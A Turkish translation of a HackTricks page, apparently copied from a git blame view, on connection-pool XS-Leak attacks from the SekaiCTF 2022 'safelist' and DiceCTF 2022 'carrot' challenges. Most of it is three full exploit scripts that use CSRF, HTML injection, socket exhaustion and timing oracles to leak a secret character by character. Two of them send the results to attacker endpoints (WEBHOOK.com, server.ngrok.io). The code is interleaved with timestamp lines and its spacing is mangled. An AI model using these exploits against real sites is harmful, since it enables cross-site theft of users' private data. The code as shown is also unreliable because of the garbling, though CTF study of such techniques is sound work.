2024-02-10 18:14:16 +00:00
# Bağlantı Havuzu Örnekleri
2022-10-12 00:12:06 +00:00
< details >
2024-02-10 18:14:16 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahraman olmak için< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > ile öğrenin!< / strong > < / summary >
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları :
2024-01-01 17:15:42 +00:00
2024-02-10 18:14:16 +00:00
* Şirketinizi HackTricks'te **reklamı nı zı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
* [**The PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) **katı lı n** veya **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )'u **takip edin** .
* Hacking hilelerinizi **HackTricks** ve **HackTricks Cloud** github depoları na PR göndererek paylaşı n.
2022-10-12 00:12:06 +00:00
< / details >
2023-08-08 08:05:16 +00:00
## Sekaictf2022 - safelist
2024-02-10 18:14:16 +00:00
[**Sekaictf2022 - safelist** ](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution ) meydan okuması nda [**@Strellic\_** ](https://twitter.com/Strellic\_ ) bir **Bağlantı Havuzu** tekniğinin bir **varyasyonunu** kullanarak bir **XS-Leak** gerçekleştirmenin bir örneğini veriyor.
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
Bu meydan okumada, hedef, baytı n bir post içinde görüneceği bot web oturumundan bir bayrağı çalmaktı r. Saldı rganı n sahip olduğu varlı klar şunlardı r:
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
* **Bot**, saldı rgan tarafı ndan verilen bir **URL'yi ziyaret edecek**
* Saldı rgan, bir **CSRF** 'yi istismar ederek sayfaya **HTML enjekte** edebilir (ancak JS değil, dompurify kullanı lı r) ve botun bu HTML ile bir post oluşturması nı sağlayabilir.
* Saldı rgan, bir **CSRF** 'yi istismar ederek **botun** web içindeki **ilk postu silmesini** sağlayabilir.
* **Postlar** alfabetik olarak sı ralandı ğı ndan, **ilk post silindiğinde** , saldı rganı n HTML içeriğinin **bayraktan önce alfabetik olarak yüklendiği** anlamı na gelir.
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
Bu nedenle, bayrağı çalmak için @Strellyc \_ tarafı ndan önerilen çözüm, **her test edilecek karakter için** botun aşağı daki işlemleri yapması nı sağlamaktı r:
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
* Bilinen bayrağı n **bilinen kı smı yla başlayan** ve birkaç **img yüklemesi** içeren bir **yeni post oluşturun** .
* **0. konumdaki postu silin**.
* 255 soketi engelleyin.
* Postları içeren sayfayı yükleyin.
* Bir siteye (bu durumda example.com) 5 rastgele istek yapı n ve bu işlemin ne kadar süreceğini ölçün.
2022-10-12 00:12:06 +00:00
{% hint style="warning" %}
2024-02-10 18:14:16 +00:00
Eğer **silinen** post **bayrak** ise, bu demektir ki HTML'ye enjekte edilen **tüm img'ler** , **5 rastgele istekle** o soket için **mücadele edecek** . Bu da ölçülen sürenin diğer senaryodan daha büyük olacağı anlamı na gelir.
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
Eğer **silinen** post **HTML** ise, **5 rastgele istek** HTML enjekte etmek için o soketle **mücadele etmeyeceği** için daha **hı zlı ** olacaktı r.
2022-10-12 00:12:06 +00:00
{% endhint %}
2023-01-02 19:26:27 +00:00
### Exploit 1
2024-02-10 18:14:16 +00:00
Bu, [https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html ](https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html ) adresinden alı nan saldı rı kodudur:
2022-10-12 00:12:06 +00:00
```html
<!-- Form to inject HTML code in the bots page -->
< form method = "POST" action = "https://safelist.ctf.sekai.team/create" id = "create" target = "_blank" >
2024-02-10 18:14:16 +00:00
< input type = "text" name = "text" / >
< input type = "submit" / >
2022-10-12 00:12:06 +00:00
< / form >
<!-- Form to delete the first entry -->
< form method = "POST" action = "https://safelist.ctf.sekai.team/remove" id = "remove" target = "_blank" >
2024-02-10 18:14:16 +00:00
< input type = "text" name = "index" value = "0" / >
< input type = "submit" / >
2022-10-12 00:12:06 +00:00
< / form >
< script >
2024-02-10 18:14:16 +00:00
// Attacker listening
const WEBHOOK = "https://WEBHOOK.com/";
// Send data to attacker
const log = (id, data) => {
let payload = JSON.stringify({ known, alphabet, data });
console.log(id, payload);
navigator.sendBeacon(WEBHOOK + "?" + id, payload);
}
// Similar to JQuery
const $ = document.querySelector.bind(document);
// Known part of the flag
const known = "SEKAI{";
let alphabet = "_abcdefghijklmnopqrstuvwxyz}";
// Reduce the alphabet using a hash (#) in the URL
if (location.hash) {
alphabet = alphabet.slice(alphabet.indexOf(location.hash.slice(1)));
}
// Funtion to leak chars
const leak = async (c) => {
// Prepare post with known flag and the new char
let payload = `${known + c}` ;
// Inject as many < img as possible
// you need to respect the CSP and create URLs that are different
for(let i = 0; payload.length < 2048 ; i + + ) {
payload += `<img src=js/purify.js?${i.toString(36)}>` ;
}
// Inject HTML
$("#create input[type=text]").value = payload;
$("#create").submit();
await new Promise(r => setTimeout(r, 1000));
// Remove post with index 0
$("#remove").submit();
await new Promise(r => setTimeout(r, 500));
let deltas = [];
// Try each char 3 times
for (let i = 0; i < 3 ; i + + ) {
const SOCKET_LIMIT = 255;
// you will need a custom server that works like num.sleepserver.com/sleep/delay
// needed to freeze the blocked sockets, and they have to all be on different origins
// Check https://www.npmjs.com/package/sleep-server using subdomains DNS wildcard
const SLEEP_SERVER = i => `http://${i}.sleepserver.com/sleep/60` ;
const block = async (i, controller) => {
try {
return fetch(SLEEP_SERVER(i), { mode: "no-cors", signal: controller.signal });
}
catch(err) {}
};
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
// block SOCKET_LIMIT sockets
const controller = new AbortController();
for (let i = 0; i < SOCKET_LIMIT ; i + + ) {
block(i, controller);
}
// Make the bot access the page with the posts
window.open("https://safelist.ctf.sekai.team/?" + Math.random().toString(36).slice(2), "pwn");
await new Promise(r => setTimeout(r, 500));
// start meassuring time to perform 5 requests
let start = performance.now();
await Promise.all([
fetch("https://example.com", { mode: "no-cors" }),
fetch("https://example.com", { mode: "no-cors" }),
fetch("https://example.com", { mode: "no-cors" }),
fetch("https://example.com", { mode: "no-cors" }),
fetch("https://example.com", { mode: "no-cors" })
]);
let delta = performance.now() - start;
document.title = delta;
controller.abort();
log("test_" + c + "_" + i, delta);
// Save time needed
deltas.push(delta);
}
return deltas;
};
// Check each char
const pwn = async () => {
// Try to leak each character
for(let i = 0; i < alphabet.length ; i + + ) {
//Check the indicated char
let deltas = await leak(alphabet[i]);
// Calculate mean time from requests to example.com
let avg = deltas.reduce((a,v) => a+v, 0) / deltas.length;
// If greater than 250, the HTML code was injected (flag in index 0)
if (avg > 250) {
log("tests_pos_" + alphabet[i], deltas)
}
// Flag in the page
else {
log("tests_neg_" + alphabet[i], deltas)
}
}
};
2023-01-02 19:26:27 +00:00
2024-02-10 18:14:16 +00:00
window.onload = async () => {
pwn();
};
< / script >
```
### Sı zma 2
2023-01-02 19:26:27 +00:00
2024-02-10 18:14:16 +00:00
Aynı taktik, ancak [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/ ](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/ ) adresindeki farklı bir kod.
2023-01-02 19:26:27 +00:00
```html
<!DOCTYPE html>
< html >
<!--
2024-02-10 18:14:16 +00:00
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs main thread.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
2023-01-02 19:26:27 +00:00
-->
< body >
2024-02-10 18:14:16 +00:00
< button onclick = "run()" > start< / button >
< form id = f action = "http://localhost:1234/create" method = "POST" target = "_blank" >
< input id = inp name = "text" value = "" >
< / form >
< form id = f2 action = "http://localhost:1234/remove" method = "POST" target = "_blank" >
< input id = inp2 name = "index" value = "" >
< / form >
< script >
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'
const sleep = ms => new Promise(r => setTimeout(r, ms))
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')
// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1
while( (R-L)>3 ) {
let M = Math.floor((L + R) / 2)
let c = charset[M]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
L = M
} else {
R = M - 1
}
}
// fallback to linear since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}
}, 0)
async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
inp.value = str + '< br > < canvas height = "3350px" > < / canvas > < br > '+Array.from({length:20}).map((_,i)=>`< img loading = lazy src = /?${i} > `).join('')
f.submit()
setTimeout(() => {
run(str, resolve)
}, 500)
})
}
async function run(str, resolve) {
// if the request is not enough, we can send more by opening more window
for(let i=1; i< =5;i++) {
window.open(TARGET)
}
let t = 0
const round = 30
setTimeout(async () => {
for(let i=0; i< round ; i + + ) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
send(str + "," + t + "," + "avg:" + avg)
/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}
// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}
< / script >
2023-01-02 19:26:27 +00:00
< / body >
< / html >
```
2024-02-10 18:14:16 +00:00
## DiceCTF 2022 - havuç
2023-01-02 19:26:27 +00:00
2024-02-10 18:14:16 +00:00
Bu durumda, saldı rı nı n ilk adı mı , bayrağı n bulunduğu sayfayı değiştirmek için CSRF'yi istismar etmekti, böylece sayfa **daha fazla içerik** içeriyordu (ve dolayı sı yla yüklenmesi daha uzun sürüyordu), ardı ndan **bağlantı havuzunu istismar ederek sayfaya erişmek için geçen süreyi ölçmek** .
2023-08-08 08:05:16 +00:00
2024-02-10 18:14:16 +00:00
Saldı rı da şunları görebilirsiniz:
2023-08-08 08:05:16 +00:00
2024-02-10 18:14:16 +00:00
* CSRF'yi istismar etmek
* 1 hariç tüm soketleri işgal etmek
* Yanı tı kalibre etmek
* Bayrak olabilecek potansiyel sayfaya erişerek brute force yapmaya başlamak
* Potansiyel sayfa erişilecek ve hemen ardı ndan saldı rganı n kontrol ettiği bir URL'ye erişilecek ve her iki isteğin ne kadar sürede gerçekleştiği kontrol edilecek.
2023-08-08 08:05:16 +00:00
```html
< h1 > DiceCTF 2022 web/carrot< / h1 >
< p > Step 1: CSRF the admin user, to set a super long title for the flag note (LAX + POST form only possible for 2 minutes after cookies is created)< / p >
< button onclick = "csrf()" > do csrf< / button >
< p > Step 2: XS-Search with < a href = "https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/" > connection-pool timing leak< / a > , we have to use window.open (LAX cookie)< / p >
< button onclick = "popunder()" > open popup< / button >
< button onclick = "exhaust_sockets()" > open 255 connections< / button >
< button onclick = "oracle('dice{abc')" > test search "abc" (slow)< / button >
< button onclick = "oracle('dice{xxx')" > test search "xxx" (fast)< / button >
< br >
< br >
< h2 id = output > < / h2 >
< br >
< form id = x action = "" method = "POST" style = "display:none;" >
2024-02-10 18:14:16 +00:00
< input type = "text" name = "title" placeholder = "title" >
< br > < br >
< input type = "number" name = "priority" placeholder = "priority" value = 9999 >
< br > < br >
< textarea name = "content" placeholder = "content" rows = "5" cols = "20" > < / textarea >
< br > < br >
< input type = "submit" value = "submit" >
2023-08-08 08:05:16 +00:00
< / form >
< script >
// this is send is used as logging
LOG = 'Starting'
// 255 in normal chrome, 99 in headless
SOCKETLIMIT = 255;
// default
TIMELIMIT = 800;
INSTANCE = ''
MYSERVER = `example.com`
const sleep = (ms) => {
2024-02-10 18:14:16 +00:00
return new Promise(resolve => {
setTimeout(resolve, ms);
});
2023-08-08 08:05:16 +00:00
}
const time_fetch = async() => {
2024-02-10 18:14:16 +00:00
let test_server_url = `https://${MYSERVER}/?${LOG}` ;
let start = window.performance.now();
try {
await fetch(test_server_url, {
mode: 'no-cors'
});
} catch (e) {
console.log(e);
}
let end = window.performance.now();
return end - start;
2023-08-08 08:05:16 +00:00
}
const fetch_sleep_long = (i) => {
2024-02-10 18:14:16 +00:00
// 40s sleep
return fetch(`https://${i}.${MYSERVER}/40sleep`, {
mode: 'no-cors'
});
2023-08-08 08:05:16 +00:00
}
const fetch_sleep_short = (i) => {
2024-02-10 18:14:16 +00:00
// 0.25s sleep
return fetch(`https://${i}.${MYSERVER}/ssleep`, {
mode: 'no-cors'
});
2023-08-08 08:05:16 +00:00
}
const block_socket = async (i) => {
2024-02-10 18:14:16 +00:00
fetch_sleep_long(i);
// needed?
await sleep(0);
2023-08-08 08:05:16 +00:00
}
const exhaust_sockets = async() => {
2024-02-10 18:14:16 +00:00
let i = 0
for (; i < SOCKETLIMIT ; i + + ) {
block_socket(i);
}
console.log(`Used ${i} connections`);
2023-08-08 08:05:16 +00:00
}
const timeit = async (url, popup) => {
2024-02-10 18:14:16 +00:00
return new Promise(async (r) => {
2023-08-08 08:05:16 +00:00
2024-02-10 18:14:16 +00:00
popup.location = url;
// needed?
await sleep(50)
2023-08-08 08:05:16 +00:00
2024-02-10 18:14:16 +00:00
let val = await time_fetch()
r(val)
});
2023-08-08 08:05:16 +00:00
}
// const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%& \'()*+,-./:; < =>?@[\\]^`|~{'.split('');
const alphabet = 'abcdefghijklmnopqrstuvwxyz}_'.split('');
// const alphabet = 'abcdef}'.split('');
const oracle = async (search) => {
2024-02-10 18:14:16 +00:00
let url = `https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`
let t = await timeit(url, WINBG)
2023-08-08 08:05:16 +00:00
2024-02-10 18:14:16 +00:00
LOG = `${search}:${t}`
console.log(`${search}:${t}`)
2023-08-08 08:05:16 +00:00
2024-02-10 18:14:16 +00:00
return t > TIMELIMIT
2023-08-08 08:05:16 +00:00
}
const brute = async (flag) => {
2024-02-10 18:14:16 +00:00
for (const char of alphabet) {
if (await oracle(flag + char)) {
return char;
}
}
return false;
2023-08-08 08:05:16 +00:00
}
const calibrate = async () => {
2024-02-10 18:14:16 +00:00
return new Promise(async (r) => {
// slow
let url1 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`
let t1 = await timeit(url1, WINBG)
console.log(`slow:${t1}`)
// fast
let url2 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`
let t2 = await timeit(url2, WINBG)
console.log(`fast:${t2}`)
return r((t1 + t2) / 2)
});
2023-08-08 08:05:16 +00:00
}
const exploit = async(flag = '') => {
2024-02-10 18:14:16 +00:00
console.log('Starting')
// dont go to fast plz :)
console.log(`waiting 3s`)
await sleep(3000)
// exaust sockets
await exhaust_sockets()
await sleep(2000)
LOG = `Calibrating`
TIMELIMIT = await calibrate()
LOG = `TIMELIMIT:${TIMELIMIT}`
console.log(`timelimit:${TIMELIMIT}`)
await sleep(2000)
let last;
while (true) {
last = await brute(flag);
if (last === false) {
return flag;
}
else {
flag += last;
output.innerText = flag;
if(last === '}'){
return flag
}
}
}
2023-08-08 08:05:16 +00:00
}
const popunder = () => {
2024-02-10 18:14:16 +00:00
if (window.opener) {
WINBG = window.opener
}
else {
WINBG = window.open(location.href, target="_blank")
location = `about:blank`
}
2023-08-08 08:05:16 +00:00
}
const csrf = async () => {
2024-02-10 18:14:16 +00:00
x.action = `https://carrot-${INSTANCE}.mc.ax/edit/0`
x.title.value = "A".repeat(1000000)
x.submit()
2023-08-08 08:05:16 +00:00
}
window.onload = () => {
2024-02-10 18:14:16 +00:00
let p = new URL(location).searchParams;
if(!p.has('i')){
console.log(`no INSTANCE`)
return
}
INSTANCE = p.get('i')
// step 1
if(p.has('csrf')){
csrf()
return
}
// step 2
if (p.has('exploit')) {
// window open is ok in headless :)
popunder()
exploit('dice{')
}
2023-08-08 08:05:16 +00:00
}
< / script >
```
2022-10-12 00:12:06 +00:00
< details >
2024-02-10 18:14:16 +00:00
< summary > < strong > AWS hackleme konusunda sı fı rdan kahramana kadar öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > !< / strong > < / summary >
2022-10-12 00:12:06 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-01-01 17:15:42 +00:00
2024-02-10 18:14:16 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA** ](https://github.com/sponsors/carlospolop ) göz atı n!
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
* [**The PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) **katı lı n** veya **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depoları na **PR göndererek paylaşı n** .
2022-10-12 00:12:06 +00:00
< / details >